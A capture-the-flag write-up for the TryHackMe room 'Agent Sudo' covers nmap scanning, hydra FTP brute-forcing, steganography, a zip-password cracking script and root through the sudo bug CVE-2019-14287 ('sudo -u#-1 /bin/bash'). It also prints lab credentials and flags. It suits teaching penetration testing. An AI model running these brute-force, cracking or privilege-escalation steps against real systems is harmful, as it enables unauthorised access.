🎯 Target IP: 10.10.62.30
Create a working directory for the machine (on the Desktop, say) with a subdirectory for the nmap scans, and map the target IP to a hostname in `/etc/hosts`:

```bash
su
echo "10.10.62.30 agent_sudo.thm" >> /etc/hosts
mkdir -p thm/agent_sudo.thm/nmap
cd thm/agent_sudo.thm
```

At the end of the room, remove the entry again. This deletes the last line of `/etc/hosts`, so make sure nothing else was appended after it:

```bash
sed -i '$ d' /etc/hosts
```
I prefer to start recon by pinging the target: it confirms connectivity, and the TTL of the replies gives a first hint about the OS.

```bash
ping -c 3 agent_sudo.thm
PING agent_sudo.thm (10.10.62.30) 56(84) bytes of data.
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=1 ttl=63 time=132 ms
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=2 ttl=63 time=81.8 ms
64 bytes from agent_sudo.thm (10.10.62.30): icmp_seq=3 ttl=63 time=123 ms
```

The replies come back with a TTL of 63. TTL is a hop count, not a number of seconds: Linux and most other *nix systems send with an initial TTL of 64, and the one router between us and the target decremented it to 63. Windows uses an initial TTL of 128 by default, so this is most likely a Linux box. The value is only a heuristic (an administrator can change the default), so the service banners from nmap below are the real confirmation.
A first fast scan of the top 1000 TCP ports, reporting only the open ones:

```bash
nmap --open -n -Pn -vvv -T4 agent_sudo.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 14:49 EDT
Warning: Hostname agent_sudo.thm resolves to 2 IPs. Using 10.10.62.30.
Initiating SYN Stealth Scan at 14:49
Scanning agent_sudo.thm (10.10.80.70) [1000 ports]
Discovered open port 80/tcp on 10.10.62.30
Discovered open port 22/tcp on 10.10.62.30
Discovered open port 21/tcp on 10.10.62.30
Completed SYN Stealth Scan at 14:49, 1.15s elapsed (1000 total ports)
Nmap scan report for agent_sudo.thm (10.10.62.30)
Host is up, received user-set (0.078s latency).
Other addresses for agent_sudo.thm (not scanned): 10.10.62.30
Scanned at 2023-07-02 14:49:50 EDT for 1s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
```

The warning that the hostname resolves to two IPs means `/etc/hosts` still held an `agent_sudo.thm` entry from a previous instance of the machine (10.10.80.70). nmap went with 10.10.62.30, but the stale line should be deleted so that other tools do not end up talking to the wrong host.
The flags used for the service scan (plus two that are commonly added):

| Flag | Meaning |
|---|---|
| `sudo` | run as root (nmap's default SYN scan needs raw sockets) |
| `-sC` | run the default NSE scripts |
| `-sV` | probe service versions |
| `-A` | aggressive mode (`-sC -sV -O --traceroute`) |
| `-T4` | faster timing template |
| `-oN <file>` | save the output in nmap's normal format |
Now a script and version scan of just the three open ports:

```bash
nmap -p21,22,80 -sCV -vvv -T4 agent_sudo.thm
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
It looks like there are three open ports on the machine: 21, 22, 80.
{% hint style="info" %} user-agent {% endhint %}
We can see the User-Agent our browser sends in the developer tools (F12). The correct User-Agent is a single capital letter, so with Burp Suite (send the request to Intruder with the letters A to Z as the payload) we can try the whole alphabet and look for the one response that differs:
{% file src="../.gitbook/assets/user-agent_burp_suite.webm" %}
Setting the User-Agent to `C` is the one that behaves differently and reveals the agent's name. Without Burp, the Firefox extension User-Agent Switcher and Manager can set the header to `C`; refreshing the page then leads to:
http://10.10.89.63/agent_C_attention.php
{% hint style="info" %} chris {% endhint %}
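As an added example (mine, not part of the original write-up), here is the same alphabet sweep as a small Python script instead of Burp. It sends one request per capital letter with that letter as `User-Agent`, does not follow redirects, and reports every codename whose status code or `Location` header differs from a baseline request. The target URL is a placeholder, and the assumption that the right codename answers with a redirect to `agent_C_attention.php` is mine; the page only shows the URL we end up on. `probe_user_agents` takes a `fetch` callable so it can be exercised offline.

```python
import string
import sys
import urllib.error
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx responses: the Location header is the interesting part."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, user_agent, timeout=10):
    """Send one GET with the given User-Agent; return (status, Location header or None)."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # 3xx land here too because redirects are disabled above
        return err.code, err.headers.get("Location")


def probe_user_agents(url, candidates=string.ascii_uppercase, fetch=http_fetch):
    """Request the page once per candidate codename and return only the candidates
    whose (status, Location) differs from a baseline request with a non-codename."""
    baseline = fetch(url, "not-a-codename")
    hits = {}
    for name in candidates:
        response = fetch(url, name)
        if response != baseline:
            hits[name] = response
    return hits


if __name__ == "__main__":
    # Assumed target; pass the real URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://agent_sudo.thm/"
    for name, (status, location) in probe_user_agents(target).items():
        print(f"User-Agent {name!r}: HTTP {status}, Location: {location}")
```

Run it as `python3 ua_probe.py http://agent_sudo.thm/`. Because it compares against a baseline rather than looking for a redirect specifically, it also catches sites that answer the right codename with a different status code or a different page instead of a redirect.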
We now know a username, chris, so we can brute-force his FTP password with hydra and the rockyou wordlist:

```bash
hydra -l chris -P /usr/share/wordlists/rockyou.txt agent_sudo.thm ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-02 18:24:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://agent_sudo.thm:21/
[STATUS] 244.00 tries/min, 244 tries in 00:01h, 14344155 to do in 979:48h, 16 active
[21][ftp] host: agent_sudo.thm login: chris password: crystal
1 of 1 target successfully completed, 1 valid password found
```
{% hint style="info" %} crystal {% endhint %}
`chris:crystal`
It's time to log in to FTP with these credentials:

```bash
ftp agent_sudo.thm
Connected to agent_sudo.thm.
220 (vsFTPd 3.0.3)
Name (agent_sudo.thm:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10070|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp> get To_agentJ.txt
local: To_agentJ.txt remote: To_agentJ.txt
229 Entering Extended Passive Mode (|||54801|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************************| 217 43.31 KiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (3.08 KiB/s)
```
```bash
cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From, Agent C
```
The note points to steganography: James's password is hidden in one of the fake pictures. We download both images with `get` as well (the session is already in binary mode, which matters for images) and start by looking at their metadata:
```bash
exiftool cute-alien.jpg
ExifTool Version Number : 12.63
File Name : cute-alien.jpg
Directory : .
File Size : 33 kB
File Modification Date/Time : 2019:10:29 08:22:37-04:00
File Access Date/Time : 2023:07:02 18:55:15-04:00
File Inode Change Date/Time : 2023:07:02 18:55:15-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 440
Image Height : 501
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 440x501
Megapixels : 0.220
```

```bash
exiftool cutie.png
ExifTool Version Number : 12.63
File Name : cutie.png
Directory : .
File Size : 35 kB
File Modification Date/Time : 2019:10:29 08:33:51-04:00
File Access Date/Time : 2023:07:02 18:55:22-04:00
File Inode Change Date/Time : 2023:07:02 18:55:22-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 528
Image Height : 528
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 762 bytes, use -b option to extract)
Transparency : (Binary data 42 bytes, use -b option to extract)
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 528x528
Megapixels : 0.279
```
The line that matters in the second listing is the warning:

```
Warning : [minor] Trailer data after PNG IEND chunk
```

`IEND` is the last chunk of a well-formed PNG, so anything after it was appended to the file and is not image data. The `Compression` and `Palette` lines are ordinary PNG properties and say nothing about hidden content. Note also what `-b` actually does: it dumps the raw value of binary tags (here the palette and transparency tables), not the trailing data, which is why this produces nothing but garbage:

```bash
exiftool -b cutie.png
Warning: [minor] Trailer data after PNG IEND chunk - cutie.png
[... raw palette and transparency bytes, not useful ...]
```

To carve the appended data we need a tool that scans for embedded file signatures, such as binwalk:
```bash
binwalk -e cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
WARNING: Extractor.execute failed to run external extractor 'jar xvf '%e'': [Errno 2] No such file or directory: 'jar', 'jar xvf '%e'' might not be installed correctly
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
```

binwalk writes what it carves into `_cutie.png.extracted/`. The zlib stream at 0x365 is just the image's own IDAT data; the interesting part is the encrypted zip appended at 0x8702, whose content binwalk could not extract (hence the 0-byte `To_agentR.txt`):

```bash
ls -l
total 316
-rw-r--r-- 1 kali kali 279312 Jul 2 19:11 365
-rw-r--r-- 1 kali kali 33973 Jul 2 19:11 365.zlib
-rw-r--r-- 1 kali kali 280 Jul 2 19:11 8702.zip
-rw-r--r-- 1 kali kali 0 Oct 29 2019 To_agentR.txt
```
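As an added example (not code from the write-up or from binwalk), the following Python does by hand what the exiftool warning and binwalk hint at: it walks the PNG chunk list, verifying each CRC, finds where `IEND` ends, and carves whatever follows, identifying a zip by its `PK\x03\x04` signature and reporting whether its entries carry the encryption flag. The sample PNG and the zip appended to it are constructed inline for the demonstration; on the real file, pass `cutie.png` as the argument.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks(data):
    """Walk the chunk list (length, type, payload, CRC) up to IEND, yielding
    (offset, type, payload). Every CRC is checked so corruption is reported."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIG)
    while True:
        if pos + 8 > len(data):
            raise ValueError("truncated PNG: no IEND chunk")
        length, ctype = struct.unpack_from(">I4s", data, pos)
        end = pos + 12 + length
        if end > len(data):
            raise ValueError(f"truncated {ctype!r} chunk at offset {pos}")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack_from(">I", data, pos + 8 + length)
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk at offset {pos}")
        yield pos, ctype, payload
        if ctype == b"IEND":
            return
        pos = end


def trailer_after_iend(data):
    """Return (offset, bytes) of anything stored after IEND, or None if the file ends there."""
    for off, ctype, payload in png_chunks(data):
        if ctype == b"IEND":
            end = off + 12 + len(payload)
            return (end, data[end:]) if end < len(data) else None


def describe_trailer(trailer):
    """Identify carved data by magic bytes; for a zip, list entries and their encryption flag."""
    if trailer.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(trailer)) as zf:
            entries = [(zi.filename, bool(zi.flag_bits & 0x1)) for zi in zf.infolist()]
        return {"type": "zip", "entries": entries}
    if trailer.startswith(b"\x1f\x8b"):
        return {"type": "gzip"}
    return {"type": "unknown", "head": trailer[:8].hex()}


def _chunk(ctype, payload):
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))


def build_sample():
    """Constructed inputs: a minimal 1x1 greyscale PNG, and the same PNG with a small zip appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("To_agentR.txt", "constructed sample, not the room's file")
    return png, png + buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()[1]
    found = trailer_after_iend(data)
    if found is None:
        print("no data after IEND")
    else:
        off, trailer = found
        print(f"{len(trailer)} bytes after IEND at offset {off} ({off:#x}): {describe_trailer(trailer)}")
        with open("carved.bin", "wb") as out:
            out.write(trailer)
```

Carving from the exact end of `IEND` matters for zips: the offsets in the central directory are relative to the start of the archive, so a carve that starts a few bytes early or late can confuse stricter unzip tools even though the data is all there.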
The archive needs a password, so we turn it into a john hash with zip2john:

```bash
zip2john 8702.zip > Output.txt
```

and crack it with John the Ripper. With no wordlist given, john runs its single-crack mode and then its default wordlist; the hit came from `/usr/share/john/password.lst`:

```bash
john Output.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE 2/3 (2023-07-03 14:07) 1.063g/s 46195p/s 46195c/s 46195C/s 123456..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
We've found the archive password:\
{% hint style="info" %} alien {% endhint %}
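As an added example (mine, not code from the write-up or from john), the following Python shows what the `ZIP, WinZip [PBKDF2-SHA1]` line in john's output means and how the crack actually works. A WinZip AES entry stores a salt and a 2-byte password-verification value in front of the ciphertext; for each candidate password the attacker runs PBKDF2-HMAC-SHA1 (1000 rounds) over the salt and compares the last two derived bytes with the stored verifier. `aes_params` reads the salt, verifier and AES strength straight from a local file header, so it works on the real `8702.zip`; the zip fragment and the four-word wordlist used below are constructed, with the password `alien` baked in.

```python
import hashlib
import struct

AES_KEY_BYTES = {1: 16, 2: 24, 3: 32}  # WinZip AE strength code -> AES key length (128/192/256)
PBKDF2_ROUNDS = 1000                    # fixed by the WinZip AE specification


def winzip_verifier(password, salt, strength):
    """Password-verification value for one candidate: PBKDF2-HMAC-SHA1 over the salt produces
    encryption key + authentication key + 2 verifier bytes; the last two bytes are the PV."""
    klen = AES_KEY_BYTES[strength]
    derived = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, PBKDF2_ROUNDS, 2 * klen + 2)
    return derived[-2:]


def aes_params(zip_bytes, header_offset=0):
    """Pull (strength, salt, verifier) out of the local file header of a WinZip AES entry:
    method 99, extra field 0x9901 for the strength, then salt and PV at the start of the file data."""
    sig, _, flags, method, _, _, _, _, _, nlen, xlen = struct.unpack_from("<4sHHHHHIIIHH", zip_bytes, header_offset)
    if sig != b"PK\x03\x04" or method != 99 or not flags & 0x1:
        raise ValueError("not a WinZip AES-encrypted entry")
    extra_start = header_offset + 30 + nlen
    extra = zip_bytes[extra_start:extra_start + xlen]
    strength, i = None, 0
    while i + 4 <= len(extra):
        eid, esize = struct.unpack_from("<HH", extra, i)
        if eid == 0x9901:  # id(2) size(2) vendor version(2) vendor "AE"(2) strength(1) method(2)
            strength = extra[i + 8]
        i += 4 + esize
    if strength not in AES_KEY_BYTES:
        raise ValueError("AES extra field 0x9901 not found")
    data = extra_start + xlen
    slen = AES_KEY_BYTES[strength] // 2  # salt is half the key length: 8, 12 or 16 bytes
    salt = zip_bytes[data:data + slen]
    verifier = zip_bytes[data + slen:data + slen + 2]
    return strength, salt, verifier


def crack_verifier(salt, verifier, wordlist, strength):
    """Dictionary attack on the 2-byte PV. One PBKDF2 run per candidate is the whole cost;
    a match has a 1/65536 chance of being a false positive, so it is a candidate, not proof."""
    return [word for word in wordlist if winzip_verifier(word, salt, strength) == verifier]


def build_sample_zip(password="alien", strength=3):
    """Constructed test vector: the local header of one WinZip AES entry (To_agentR.txt, deflate inside AES),
    followed by salt and PV for `password`. No ciphertext or central directory; enough for aes_params()."""
    klen = AES_KEY_BYTES[strength]
    salt = bytes.fromhex("00112233445566778899aabbccddeeff")[:klen // 2]  # constructed salt
    name = b"To_agentR.txt"
    extra = struct.pack("<HHH2sBH", 0x9901, 7, 2, b"AE", strength, 8)
    header = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 51, 0x1, 99, 0, 0, 0, 0, 0, len(name), len(extra))
    return header + name + extra + salt + winzip_verifier(password, salt, strength)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_zip()
    strength, salt, pv = aes_params(blob)
    words = ["123456", "password", "area51", "alien"]  # constructed mini wordlist
    print(f"AES-{8 * AES_KEY_BYTES[strength]}, salt={salt.hex()}, pv={pv.hex()}")
    print("candidates:", crack_verifier(salt, pv, words, strength))
```

For the real archive run it with `8702.zip` as the argument (the first local header sits at offset 0). A verifier match is only a candidate: john goes on to check the HMAC-SHA1 authentication code over the ciphertext (the "HMAC size" cost it reports) before declaring the password cracked, and a serious tool should do the same to rule out the 1-in-65536 false positives.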
`unzip` cannot open this archive: john identified it as WinZip AES (`PBKDF2-SHA1`), and Info-ZIP's unzip does not support that encryption. 7-Zip does; it prompts for the password `alien`:

```bash
7z e 8702.zip
ls
365 365.zlib 8702.zip Output.txt To_agentR_1.txt To_agentR.txt
```
```bash
cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By, Agent R
```
`QXJlYTUx` looks like base64 (only letters and digits, length a multiple of four). Decode it with CyberChef (https://gchq.github.io/CyberChef/#input=UVhKbFlUVXg) or on the command line:

```bash
echo 'QXJlYTUx' | base64 -d
```
{% hint style="info" %} Area51 {% endhint %}
Agent R's note says the picture is to be sent to "Area51", and Agent C's note said the login password is stored in the fake picture, so Area51 is most likely the steghide passphrase for cute-alien.jpg (the prompt does not echo it):

```bash
steghide --extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
```
```bash
cat message.txt
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy, chris
```
{% hint style="info" %} James {% endhint %}
Reading message.txt, we learn that james's password is:
{% hint style="info" %} hackerrules! {% endhint %}
```bash
ssh james@agent_sudo.thm
james@agent_sudo.thm's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
ls
Alien_autospy.jpg user_flag.txt
cat user_flag.txt
```

🚩 Flag 1 (user_flag.txt)
b03d975e8c92a7c04146cfa7a5a313c7
The next question asks where the image is from. Copy it off the machine with scp and run a reverse image search on it with Google:

```bash
scp james@10.10.62.30:Alien_autospy.jpg /home/
```
{% hint style="info" %} Roswell alien autopsy {% endhint %}
Now for privilege escalation. Start by listing what james is allowed to run through sudo:

```bash
sudo -l
```

Googling the rule that `sudo -l` prints leads to CVE-2019-14287: in sudo before 1.8.28, a user who may run a command as any user except root (a `!root` rule) can still run it as root. Alternatively, grab the sudo version with `sudo -V` and look it up with searchsploit:
{% hint style="info" %} CVE-2019-14287 {% endhint %}
The bug is in how sudo parsed the numeric user given with `-u#`: `-1` was accepted and cast to `uid_t`, giving 4294967295. That value is not 0, so the `!root` check passes, but to setresuid(2) a uid of -1 means "leave unchanged", so the sudo process, which already runs as root, simply stays root. We use it to escalate privileges:

```bash
sudo -u#-1 /bin/bash
```

We're root:

```bash
whoami
root
```
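As an added example (mine, not the write-up's and not sudo's actual source), the following Python models the two halves of CVE-2019-14287: how `-u#-1` was parsed before and after the 1.8.28 fix, why a `(ALL, !root)` rule does not catch the resulting uid, and the setresuid(2) behaviour that turns it into root. The `strtoid_*` functions are simplified stand-ins for sudo's parser; the last function calls the real syscall, which any unprivileged user may do when all three arguments are -1, so it runs without root.

```python
import ctypes
import os

UID_T_MINUS_ONE = 0xFFFFFFFF  # (uid_t)-1 with a 32-bit uid_t; setresuid(2) reads it as "leave unchanged"


def strtoid_vulnerable(text):
    """Stand-in for sudo < 1.8.28: accept any integer for -u#N and cast it to uid_t.
    "-1" therefore becomes 4294967295 instead of being rejected."""
    return ctypes.c_uint32(int(text, 10)).value


def strtoid_fixed(text):
    """Stand-in for the 1.8.28 fix: -1 and UINT_MAX are refused before any cast."""
    value = int(text, 10)
    if value in (-1, UID_T_MINUS_ONE) or not 0 <= value <= UID_T_MINUS_ONE:
        raise ValueError(f"invalid user ID: {text}")
    return value


def blocked_by_not_root_rule(uid):
    """A (ALL, !root) rule denies uid 0 only; 4294967295 is "not root" as far as policy is concerned."""
    return uid == 0


def setresuid_minus_one_is_noop():
    """Kernel side of the bug: setresuid(-1, -1, -1) is a no-op that any user may call,
    so a sudo process already running as root simply stays root."""
    before = os.getresuid()
    os.setresuid(-1, -1, -1)
    return before == os.getresuid()


if __name__ == "__main__":
    for arg in ("0", "1000", "-1", "4294967295"):
        uid = strtoid_vulnerable(arg)
        print(f"-u#{arg}: vulnerable parse -> {uid}, denied by !root: {blocked_by_not_root_rule(uid)}")
        try:
            strtoid_fixed(arg)
            print("  fixed parse: accepted")
        except ValueError as err:
            print(f"  fixed parse: {err}")
    print("setresuid(-1,-1,-1) left uids unchanged:", setresuid_minus_one_is_noop())
```

The two values to remember from the output are that `-1` and `4294967295` both parse to the same uid under the old code, and that neither is denied by a rule that only excludes uid 0. The fix is in the parser, not in the kernel: `-1` as a uid argument is documented setresuid behaviour and was never going to change.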
```bash
cd /root
ls
root.txt
cat root.txt
```

🚩 Flag 2 (root.txt)
b53a02f55b57d4439e3341834d70c062
The root flag comes with a message that gives away Agent R's name:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
By, DesKel a.k.a Agent R
{% hint style="info" %} DesKel {% endhint %}